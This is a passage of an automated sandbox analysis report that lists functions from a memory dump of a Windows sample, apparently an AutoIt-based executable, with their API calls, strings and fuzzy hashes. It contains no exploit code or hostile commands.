Opcode Fuzzy Hash: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
Instruction Fuzzy Hash: B4517C70900709AFDB209FA9CE85F6EBBF5FF44708F10492CE686B25A0CB75A945CB40

Function 00EFA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EFA4C8
DestroyWindow.USER32(?,?), ref: 00EFA542

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EFA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EFA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA5F1
DestroyWindow.USER32(00000000), ref: 00EFA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EFA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA663
GetDesktopWindow.USER32 ref: 00EFA67C
GetWindowRect.USER32(00000000), ref: 00EFA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EFA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EFA6B3

Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC

Strings

0, xrefs: 00EFA4DE
tooltips_class32, xrefs: 00EFA5B5, 00EFA643

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
Instruction ID: 0ae913a5509fe34183f82f91d4888fbed1772d3d65c0f93d75b26d48bb8d1e07
Opcode Fuzzy Hash: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
Instruction Fuzzy Hash: 18716BB1140209AFD720CF28C845F767BE6EF88304F09452DFA89EB2A1DB70E905DB56

Function 00EFC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

DragQueryPoint.SHELL32(?,?), ref: 00EFC917

Part of subcall function 00EFADF1: ClientToScreen.USER32(?,?), ref: 00EFAE1A
Part of subcall function 00EFADF1: GetWindowRect.USER32(?,?), ref: 00EFAE90
Part of subcall function 00EFADF1: PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00EFC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EFC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EFC9AE
_wcscat.LIBCMT ref: 00EFC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EFC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA47
DragFinish.SHELL32(?), ref: 00EFCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EFCB41

Strings

@GUI_DROPID, xrefs: 00EFCA6E
@GUI_DRAGFILE, xrefs: 00EFCAF0
@GUI_DRAGID, xrefs: 00EFCAB9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
Instruction ID: 137ad8aec1931496ff0bae534e077eea30b3c7a5aa02d4b18a17b1bfe5f1c222
Opcode Fuzzy Hash: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
Instruction Fuzzy Hash: D7617A71108304AFC711EF60DC85DAFBBE8EFC8710F10492EF695A61A1DB709A49CB92

Function 00EF4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EF46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF46F6

Strings

EXPAND, xrefs: 00EF47A8
GETITEMCOUNT, xrefs: 00EF47D8
EXISTS, xrefs: 00EF475F
GETTEXT, xrefs: 00EF4849
GETSELECTED, xrefs: 00EF4806
GETTOTALCOUNT, xrefs: 00EF46DD
UNCHECK, xrefs: 00EF48D2
COLLAPSE, xrefs: 00EF473C
SELECT, xrefs: 00EF48A7
CHECK, xrefs: 00EF4716
ISCHECKED, xrefs: 00EF4879

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
Instruction ID: d8c7500b85dc4d00ed289c39d4aee52f61d180cb774cafb87f14dc696f029277
Opcode Fuzzy Hash: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
Instruction Fuzzy Hash: 6D9169742043059FCB14EF20C451A6AB7E1AF84314F05A86DF99A7B3A3DB31ED4ACB81

Function 00EFBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EFBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00EF6D80,?), ref: 00EFBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EFBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC7D
FreeLibrary.KERNEL32(?), ref: 00EFBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EFBC99
DestroyIcon.USER32(?), ref: 00EFBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EFBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EFBCD1

Part of subcall function 00E9313D: __wcsicmp_l.LIBCMT ref: 00E931C6

Strings

.dll, xrefs: 00EFBB27
.icl, xrefs: 00EFBAE4
.exe, xrefs: 00EFBB04

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
Instruction ID: 08ae7f39b066d29435036b02151185ab5f3ae16d2b287dc185b897f9bf469184
Opcode Fuzzy Hash: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
Instruction Fuzzy Hash: 0A61CF71500219BEEF14DF65CC85FBABBA8EF08710F10911AFE15E61D1DB74AA94CBA0

Function 00EDA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

CharLowerBuffW.USER32(?,?), ref: 00EDA636
GetDriveTypeW.KERNEL32 ref: 00EDA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA730

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

Strings

open , xrefs: 00EDA692
open, xrefs: 00EDA65D
close, xrefs: 00EDA63C
close cd wait, xrefs: 00EDA71B
type cdaudio alias cd wait, xrefs: 00EDA6AE
wait, xrefs: 00EDA6ED
closed, xrefs: 00EDA64A, 00EDA653
set cd door , xrefs: 00EDA6D1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
Instruction ID: 1b80546c7905b8d68cdd23b6605886b6fa0f0e03c284c57139d2eb2845f5a65a
Opcode Fuzzy Hash: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
Instruction Fuzzy Hash: B7515E711043059FC700EF24D98196AB7F4FF98718F14996DF89A672A2DB31EE0ACB52

Function 00EDA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDA47A
__swprintf.LIBCMT ref: 00EDA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00EDA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EDA4FE
_memset.LIBCMT ref: 00EDA51D
_wcsncpy.LIBCMT ref: 00EDA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EDA58E
CloseHandle.KERNEL32(00000000), ref: 00EDA599
RemoveDirectoryW.KERNEL32(?), ref: 00EDA5A2
CloseHandle.KERNEL32(00000000), ref: 00EDA5AC

Strings

\, xrefs: 00EDA4B2
:, xrefs: 00EDA4BD
\??\%s, xrefs: 00EDA496

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
Instruction ID: 165c6989963925740e325f786886101cd26733c84bae6de45de172a7f9601241
Opcode Fuzzy Hash: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
Instruction Fuzzy Hash: 9E31AEB650020AABDB219FA1DC48FFB33BCEF88705F1451B6F908E6160E77097458B25

Function 00EAAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00EAAB7B
___wtomb_environ.LIBCMT ref: 00EAAB9D

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

__malloc_crt.LIBCMT ref: 00EAABC5
__malloc_crt.LIBCMT ref: 00EAABE2
_free.LIBCMT ref: 00EAAC19
__recalloc_crt.LIBCMT ref: 00EAAC52
__recalloc_crt.LIBCMT ref: 00EAAC97
_strlen.LIBCMT ref: 00EAACC3
__calloc_crt.LIBCMT ref: 00EAACCD
_strlen.LIBCMT ref: 00EAACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00EAAD0A
_free.LIBCMT ref: 00EAAD24
_free.LIBCMT ref: 00EAAD31
_free.LIBCMT ref: 00EAAD43
__invoke_watson.LIBCMT ref: 00EAAD5D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 67b965ab29300125ec8fa319787abd59e33de0a317c72dac2c0f7ddd7eec0c66
Instruction ID: 69aabd74fd31051de67460abd65d46bb528ec76875865d73b228f3a6a3b42feb
Opcode Fuzzy Hash: 67b965ab29300125ec8fa319787abd59e33de0a317c72dac2c0f7ddd7eec0c66
Instruction Fuzzy Hash: 1161E372504305AFEB116F24D841B6977E5EB1A739F186139E801BF191DB34F940C762

Function 00EDDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00EDDC7B
_wcscat.LIBCMT ref: 00EDDC93
_wcscat.LIBCMT ref: 00EDDCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EDDCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDDCCE
GetFileAttributesW.KERNEL32(?), ref: 00EDDCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 00EDDD00
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDDD12

Strings

*.*, xrefs: 00EDDD51

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: f9ff3735a8ce78279fe2ae24246fde03d2df5636def3f83a317877fbea56bf02
Instruction ID: c81536bf817667cb96448e7841e02389664965655d9e7a48a8fcfdb58090cdb3
Opcode Fuzzy Hash: f9ff3735a8ce78279fe2ae24246fde03d2df5636def3f83a317877fbea56bf02
Instruction Fuzzy Hash: 4F8171715082459FCB24EF24CC459AAB7E8EF88318F15A82FF889E7351E731D946CB52

Function 00EFC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EFC4EC
GetFocus.USER32 ref: 00EFC4FC
GetDlgCtrlID.USER32(00000000), ref: 00EFC507
_memset.LIBCMT ref: 00EFC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EFC65D
GetMenuItemCount.USER32(?), ref: 00EFC67D
GetMenuItemID.USER32(?,00000000), ref: 00EFC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EFC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EFC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EFC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EFC779

Strings

0, xrefs: 00EFC62A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: e65dca02599655e48cb6c363147e4126c9cc13a9221a03b634b0099bbf0542c0
Instruction ID: 0db9ba8d7ff0dc20299cd98c2347d7d4fcf896c0a9253ba57b99ea22921e3adc
Opcode Fuzzy Hash: e65dca02599655e48cb6c363147e4126c9cc13a9221a03b634b0099bbf0542c0
Instruction Fuzzy Hash: DA817E70508309AFD710DF24CA84A7ABBE4FF88758F20592EFA95E7291D730D905CB92

Function 00EC83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D

Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8458
_memset.LIBCMT ref: 00EC846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC848C
GetLengthSid.ADVAPI32(?), ref: 00EC849D
GetAce.ADVAPI32(?,00000000,?), ref: 00EC84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC84F6
GetLengthSid.ADVAPI32(?), ref: 00EC8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8522
HeapAlloc.KERNEL32(00000000), ref: 00EC8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC854A
CopySid.ADVAPI32(00000000), ref: 00EC8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC85BC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
Instruction ID: be1b65f47c1020efd1684c5baa67a75548ef60e1994f7e875b2d79b9e2cbc9bd
Opcode Fuzzy Hash: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
Instruction Fuzzy Hash: F9613871900219AFDF109FA5DE45EAEBBB9FF48304F048169E815B7291DB729A06CF60

Function 00EE762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00EE76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EE76AE
CreateCompatibleDC.GDI32(?), ref: 00EE76BA
SelectObject.GDI32(00000000,?), ref: 00EE76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EE771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EE777B
SelectObject.GDI32(00000006,?), ref: 00EE7783
DeleteObject.GDI32(?), ref: 00EE778C
DeleteDC.GDI32(00000006), ref: 00EE7793
ReleaseDC.USER32(00000000,?), ref: 00EE779E

Strings

(, xrefs: 00EE7723

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ffbf8daf2897f736f88434db835ebf70ad884eb534b7c90b4bfaf7278ab41c59
Instruction ID: dac800ad4847e569d859dac71e2f96a421cfb37db70b4db3b4ed6fc85fa702e4
Opcode Fuzzy Hash: ffbf8daf2897f736f88434db835ebf70ad884eb534b7c90b4bfaf7278ab41c59
Instruction Fuzzy Hash: 1B516B75904349EFCB15CFA9CC84EAEBBB9EF48710F14852EF999A7210D731A944CB60

Function 00EDA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00EFFB78), ref: 00EDA0FC

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00EDA11E
__swprintf.LIBCMT ref: 00EDA177
__swprintf.LIBCMT ref: 00EDA190
_wprintf.LIBCMT ref: 00EDA246
_wprintf.LIBCMT ref: 00EDA264

Strings

^ ERROR, xrefs: 00EDA1E8
"%s" (%d) : ==> %s:, xrefs: 00EDA25F
Line %d (File "%s"):, xrefs: 00EDA171, 00EDA18A
"%s" (%d) : ==> %s:%s%s, xrefs: 00EDA241
Error: , xrefs: 00EDA20E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
Instruction ID: 6b7aae980be20341d69732b85561ec4b4f491e330966490a6c2b36c0fd9bae7e
Opcode Fuzzy Hash: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
Instruction Fuzzy Hash: 72518E72900209BACF15EBE0DD86EEEB7B9EF04300F245166F509721A1EB316F59DB61

Function 00E76BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00E90B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E76C6C,?,00008000), ref: 00E90BB7

Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00E76E5A

